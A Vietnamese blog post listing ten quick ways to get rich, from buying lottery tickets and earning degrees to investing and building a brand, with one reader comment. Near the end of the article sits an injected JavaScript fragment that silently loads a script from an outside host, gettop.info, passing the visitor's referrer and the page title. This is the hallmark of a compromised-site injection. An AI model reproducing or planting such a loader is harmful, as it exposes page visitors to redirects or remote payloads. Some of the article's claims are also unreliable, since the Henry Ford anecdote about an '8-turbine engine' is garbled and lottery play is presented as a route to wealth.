Những cách kiếm tiền nhanh nhất trong năm 2014-2015

Làm giàu không phải chuyện đơn giản nhưng nếu bạn biết một số mẹo thì bạn có thể kiếm được số tiền lớn tiêu suốt cả đời không bao giờ hết.

29

Dưới đây là một số phương pháp giúp bạn kiếm tiền nhanh nhất

 

1. Chơi sổ số kiếm tiền không phải nghĩ

 

Một cách rất dễ mà ai cũng có thể làm được, ra ngoài đường mua lấy một tờ vé số và chờ đợi. Rất nhiều người giàu có và trở thành tỷ phú, triệu phú nhờ cách này. Về mình thì mình chả thích thú cái cách này một tẹo nào.

 

2. Học tập tốt và có một tấm bằng tại trường học danh tiếng

picture1

Nếu cầm một tấm bằng vip trong tay bạn không lo thất nghiệp nữa đâu. Những người giàu có là những người có chuyên môn giỏi. Học tập là một qua trình gian nan đòi hỏi hiều công sức bạn nên kiên nhẫn.

Ngoài ra bạn còn có nhiều cách khác để kiếm tiền khác nhanh hơn.

 

3. Tự lập công ty để làm giàu

 

Những người giàu là những người có công ty, đại số đông đều là như thế. Có khả năng thì bạn hãy tự mở một công ty cho mình để làm ăn. Không việc gì phải đi theo bám gót người khác. Tự làm giàu theo cách bạn nghĩ.

 

4. Mua cổ phiếu ở những công ty đang ăn nên làm nổi

 

Cái này thì như kiểu góp vốn thôi, nhưng nếu chưa có kinh nghiệm bạn nên đọc qua ít tài liệu và tham khảo chuyên gia trước bạn nhé.

 

5. Nỗ lực hết sức để làm công việc hiện tại

 

Mình đã thành công với cách này, tuy chưa giàu có thành triệu phú nhưng thu nhập của mình đã gia tăng gấp 5 lần trước đó. Một cách tuyệt vời để kiếm tiền và đúc rút kinh nghiệm cho chính bạn.

Nếu bạn đang xuất phát từ một công việc có mức lương thấp thì hãy cố gắng lên. Thu nhập của bạn sẽ được cải thiện xứng đáng với những gì bạn bỏ ra.

 

6. Mang tiền đi đầu tư

 

Bạn bè người thân của bạn đang có chiến lược kinh doanh gì đó và cần hỗ trợ. Tại sao không dùng số tiền của bạn để đầu tư sinh lợi. Rải rác một số nơi, mỗi nơi vài triệu đồng chắc không phải điều gì quá khó khăn với bạn – một người đang muốn làm giàu đúng không. Nếu họ không thành công thì bạn cũng tích lũy cho mình được kinh nghiệm và gây dựng được nhiều mối quan hệ có giá trị gấp nhiều lần số tiền bạn bỏ ra.

 

7. Hành động mạo hiểm và sáng tạo để kiếm tiền

 

Cách này là cách nhiều triệu phú đô la Mỹ đã thành công. Một kỹ sư học chưa hết trung học phổ thông mà Henry Ford đã trở thành chủ tịch tập đoàn ô tô Ford lớn mạnh toàn cầu. Chỉ vì không ta luôn luôn yêu cầu những người làm cho ông chế tạo một động cơ 8 tuabin trong một hộp máy. Tại thời điểm đó là không thể nhưng rồi sau nỗ lực của Henry Ford ông ta đã có nó trong tay và trở nên giàu có hơn nữa.

Bạn đang muốn trở nên giàu có và kiếm tiền một cách dễ dàng ư? Nếu thế thì bạn khó có thể giàu được, hãy mạo hiểm đánh đổi thứ gì đó để bạn trở nên giàu có.

 

8. Chi tiêu tiết kiệm và lập kế hoạch tài chính

 

Luôn luôn kiểm soát dòng tiền của bạn được sử dụng một cách thông mình. Không chi tiền vào những chỗ thừa. Sau vài tháng bạn sẽ giàu có hơn bạn bây giờ rất nhiều. Sau đó dùng khoản tiền dư thừa đó tái đầu tư sinh lợi nhằm gia tăng dòng tiền thu nhập cũng như lợi nhuận sinh lãi trong tương lai.

 

9. Học hỏi kinh nghiệm từ những người giàu có

 

Chả có ai đủ thông minh học hỏi cả đời và chả có ai đủ sức để vấp ngã thất bại suốt đời mà rút ra kinh nghiệm. Vì thế hãy tìm một người nào đó thực sự giỏi giang và học tập từ họ những kinh nghiệm quý báu. Chỉ có thế bạn mới không mắc sai lầm trên con đường đi và kết quả chính là những gì bạn nhìn thấy được từ người bạn đang học hỏi.

 

10. Sáng tạo và thiết lập bản quyền,  gây dựng giá trị thương hiệu.

 

Bạn hãy ngừng lại một chút và suy nghĩ về thế giới. Nếu bạn có kiến thức sâu về triết học kinh tế, kinh tế học và sáng tạo kinh doanh thì bạn nên thử ngồi lại.Bình tĩnh, đặt mình vào là khách hàng, nghĩ xem họ cần gì, nếu bạn là họ thì bạn sẽ mua gì, cần gì. Hãy trở thành một vị khách hàng khó tính nhất và tìm ra các liệu pháp đáp ứng toàn bộ nhu cầu của khách hàng khó tính nhất này. Liên tục trả lời các câu hỏi liên quan đến vấn đề của bạn để giải đáp. Nhờ đây bạn sẽ hoàn thiện bản kế hoạch làm giàu của mình một cách chi tiết. Nhìn vào bản kế hoạch ấy bạn sẽ đưa ra được định hướng trên con đường kiếm tiền của mình.

Nếu bạn đã có một ý tưởng nào đó thì việc quan trọng nhất bạn cần làm là bắt tay vào thực hiện nó. Khi đã thành công với sản phẩm đó thì nên đăng ký sở hữu bản quyền. Ngay lập tức thương hiệu đó chỉ thuộc riêng về bạn vào nó sẽ giúp bạn kiếm tiền.

Bản thân mình viết blog chuyên về một mảng, viết nhiều viết hay mọi người chú ý đến là mình thích rồi. Thế rồi vào một ngày đẹp trời có người liên hệ mình hợp tác kinh doanh. Từ đó thương hiệu được khẳng định, viết blog để kiếm tiền một thú vui nhẹ nhàng.

 

 

 

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

0 Trả lời “Những cách kiếm tiền nhanh nhất trong năm 2014-2015

  1. trong các cách kiếm tiền trên tôi thấy vẫn trung trung, vẫn chưa thể hiện một cách rõ ràng để kiếm tiền. chẳng hạn khi có một chút tiền dư giả thì mang đầu tư. vấn đề là ở chỗ này đầu tư cái gì, đầu tư như thế nào? cũng có người đầu tư và làm ăn được, cũng có người lại thất bại mất cả vốn lẫn lời. vì vậy cần nói rõ và tư vấn làm sao mà người đầu tư biết chắc chắn sẽ là có sinh lời, có nghĩa là vạch ra một con đường mà người đi trên đó sẽ an toàn.

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *